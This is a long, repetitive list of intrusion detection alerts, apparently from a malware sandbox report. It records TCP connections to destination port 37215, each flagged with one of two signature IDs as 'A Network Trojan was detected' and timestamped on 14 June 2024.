                SID:2835222
                Source Port:47316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860127
                SID:2829579
                Source Port:55796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112159
                SID:2829579
                Source Port:42480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915635
                SID:2829579
                Source Port:54566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.845845
                SID:2835222
                Source Port:34068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716913
                SID:2835222
                Source Port:32870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672683
                SID:2835222
                Source Port:36674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501668
                SID:2835222
                Source Port:57452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.028073
                SID:2829579
                Source Port:55476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934385
                SID:2835222
                Source Port:34480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759726
                SID:2835222
                Source Port:35592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916427
                SID:2829579
                Source Port:38924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471305
                SID:2835222
                Source Port:41794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564764
                SID:2835222
                Source Port:49340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292709
                SID:2829579
                Source Port:56508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660975
                SID:2835222
                Source Port:40200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411448
                SID:2829579
                Source Port:44910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717947
                SID:2835222
                Source Port:56818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616089
                SID:2835222
                Source Port:39786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791164
                SID:2835222
                Source Port:54432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848840
                SID:2835222
                Source Port:47946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717884
                SID:2829579
                Source Port:59784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469711
                SID:2835222
                Source Port:40844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663211
                SID:2829579
                Source Port:34212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421226
                SID:2829579
                Source Port:35764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276569
                SID:2829579
                Source Port:60138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568407
                SID:2835222
                Source Port:40262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807331
                SID:2835222
                Source Port:57208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054947
                SID:2835222
                Source Port:50178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274229
                SID:2835222
                Source Port:58864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828344
                SID:2829579
                Source Port:49220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111623
                SID:2835222
                Source Port:57900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682653
                SID:2835222
                Source Port:35702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947242
                SID:2835222
                Source Port:41152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032689
                SID:2835222
                Source Port:36032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503601
                SID:2835222
                Source Port:42466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830946
                SID:2835222
                Source Port:42018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.069691
                SID:2835222
                Source Port:36854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716065
                SID:2835222
                Source Port:54754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368830
                SID:2835222
                Source Port:40120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.719002
                SID:2835222
                Source Port:59852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829579
                SID:2835222
                Source Port:33262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812260
                SID:2829579
                Source Port:34304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051318
                SID:2829579
                Source Port:39326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545502
                SID:2835222
                Source Port:47892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916319
                SID:2835222
                Source Port:50532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827500
                SID:2829579
                Source Port:38622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727567
                SID:2829579
                Source Port:49402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812797
                SID:2829579
                Source Port:55934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980776
                SID:2835222
                Source Port:45004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932538
                SID:2835222
                Source Port:58002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789508
                SID:2829579
                Source Port:43362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671748
                SID:2835222
                Source Port:53184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148904
                SID:2835222
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776875
                SID:2829579
                Source Port:34128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180201
                SID:2835222
                Source Port:58192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984505
                SID:2829579
                Source Port:34686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089885
                SID:2829579
                Source Port:35466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185067
                SID:2829579
                Source Port:47140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807678
                SID:2835222
                Source Port:39054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790535
                SID:2835222
                Source Port:42060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502566
                SID:2835222
                Source Port:46340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023096
                SID:2835222
                Source Port:50032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761593
                SID:2829579
                Source Port:48094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967847
                SID:2829579
                Source Port:34288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022140
                SID:2829579
                Source Port:38092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421079
                SID:2829579
                Source Port:50214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322126
                SID:2835222
                Source Port:47460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666865
                SID:2829579
                Source Port:45230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682714
                SID:2829579
                Source Port:50308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779570
                SID:2829579
                Source Port:47332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472883
                SID:2829579
                Source Port:49716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647198
                SID:2829579
                Source Port:47408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366931
                SID:2829579
                Source Port:54804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023746
                SID:2835222
                Source Port:35558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913439
                SID:2835222
                Source Port:58738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986510
                SID:2835222
                Source Port:53138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663249
                SID:2835222
                Source Port:58234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227154
                SID:2835222
                Source Port:59422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737453
                SID:2829579
                Source Port:40364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701389
                SID:2835222
                Source Port:56232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704232
                SID:2829579
                Source Port:37908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846197
                SID:2835222
                Source Port:47390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149437
                SID:2829579
                Source Port:45238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.425132
                SID:2835222
                Source Port:51992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732268
                SID:2829579
                Source Port:56682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569271
                SID:2835222
                Source Port:36524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165061
                SID:2835222
                Source Port:55152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338556
                SID:2829579
                Source Port:38672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940477
                SID:2835222
                Source Port:35386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503222
                SID:2829579
                Source Port:60898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671967
                SID:2829579
                Source Port:38440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737544
                SID:2829579
                Source Port:53836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451340
                SID:2835222
                Source Port:50304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917943
                SID:2835222
                Source Port:53910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702225
                SID:2835222
                Source Port:45128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788987
                SID:2835222
                Source Port:42904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830010
                SID:2829579
                Source Port:53506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179038
                SID:2835222
                Source Port:39996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859267
                SID:2835222
                Source Port:56324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624739
                SID:2835222
                Source Port:42242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053136
                SID:2835222
                Source Port:42834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369186
                SID:2835222
                Source Port:33262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916765
                SID:2835222
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617779
                SID:2829579
                Source Port:36086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716930
                SID:2829579
                Source Port:60042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940803
                SID:2835222
                Source Port:50990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662590
                SID:2829579
                Source Port:53572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325137
                SID:2829579
                Source Port:60978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014485
                SID:2835222
                Source Port:59998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944136
                SID:2829579
                Source Port:44416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323036
                SID:2835222
                Source Port:51282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718024
                SID:2829579
                Source Port:52462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450928
                SID:2835222
                Source Port:58014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735628
                SID:2829579
                Source Port:56454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686582
                SID:2835222
                Source Port:50816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857938
                SID:2829579
                Source Port:60778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012033
                SID:2835222
                Source Port:36064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830809
                SID:2829579
                Source Port:60168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034729
                SID:2829579
                Source Port:35290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163226
                SID:2829579
                Source Port:38146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564573
                SID:2829579
                Source Port:60310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828371
                SID:2829579
                Source Port:33498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897278
                SID:2835222
                Source Port:44224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759656
                SID:2829579
                Source Port:59618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943300
                SID:2835222
                Source Port:44986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971924
                SID:2829579
                Source Port:34284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989965
                SID:2829579
                Source Port:53396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645929
                SID:2829579
                Source Port:40276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968826
                SID:2835222
                Source Port:54434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640556
                SID:2829579
                Source Port:42596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683152
                SID:2835222
                Source Port:49298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421725
                SID:2829579
                Source Port:50730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033695
                SID:2835222
                Source Port:56832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325313
                SID:2835222
                Source Port:37342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548932
                SID:2835222
                Source Port:60268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072994
                SID:2829579
                Source Port:57226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470061
                SID:2835222
                Source Port:44682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660750
                SID:2829579
                Source Port:38014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724549
                SID:2829579
                Source Port:55104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663310
                SID:2829579
                Source Port:39164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083657
                SID:2829579
                Source Port:44604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567036
                SID:2829579
                Source Port:59590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291228
                SID:2835222
                Source Port:33556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683594
                SID:2835222
                Source Port:58620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716368
                SID:2829579
                Source Port:54926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827419
                SID:2829579
                Source Port:60576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072286
                SID:2829579
                Source Port:54830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934447
                SID:2835222
                Source Port:45414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051065
                SID:2829579
                Source Port:36800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565038
                SID:2829579
                Source Port:47174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505163
                SID:2835222
                Source Port:38426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905018
                SID:2829579
                Source Port:37434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.046063
                SID:2835222
                Source Port:45074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944267
                SID:2829579
                Source Port:60144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034892
                SID:2829579
                Source Port:37166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662346
                SID:2835222
                Source Port:41208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246330
                SID:2835222
                Source Port:45606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942580
                SID:2829579
                Source Port:40806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473697
                SID:2829579
                Source Port:55496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765936
                SID:2835222
                Source Port:37898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502269
                SID:2835222
                Source Port:48306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245569
                SID:2829579
                Source Port:48650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148054
                SID:2829579
                Source Port:52158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164536
                SID:2835222
                Source Port:34668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449869
                SID:2829579
                Source Port:43638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545944
                SID:2829579
                Source Port:54832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148785
                SID:2835222
                Source Port:42210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115251
                SID:2835222
                Source Port:40054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663794
                SID:2835222
                Source Port:50422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812099
                SID:2829579
                Source Port:52968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966600
                SID:2835222
                Source Port:45318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094449
                SID:2835222
                Source Port:54716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469865
                SID:2829579
                Source Port:35874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672329
                SID:2835222
                Source Port:49326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152866
                SID:2835222
                Source Port:32896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969688
                SID:2829579
                Source Port:41072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056378
                SID:2829579
                Source Port:56444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965682
                SID:2835222
                Source Port:48544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681807
                SID:2835222
                Source Port:41552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228728
                SID:2829579
                Source Port:52234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052803
                SID:2829579
                Source Port:47976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987448
                SID:2835222
                Source Port:44108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073548
                SID:2835222
                Source Port:43624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718368
                SID:2835222
                Source Port:48378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625562
                SID:2835222
                Source Port:55572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830520
                SID:2835222
                Source Port:49574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088807
                SID:2835222
                Source Port:39982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033716
                SID:2835222
                Source Port:54984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025791
                SID:2835222
                Source Port:58018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074277
                SID:2835222
                Source Port:60704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421597
                SID:2829579
                Source Port:47144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792724
                SID:2835222
                Source Port:55800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543731
                SID:2829579
                Source Port:50940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011762
                SID:2835222
                Source Port:35610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790831
                SID:2835222
                Source Port:41172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732139
                SID:2835222
                Source Port:54046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980464
                SID:2835222
                Source Port:54634
                Destination Port:37215
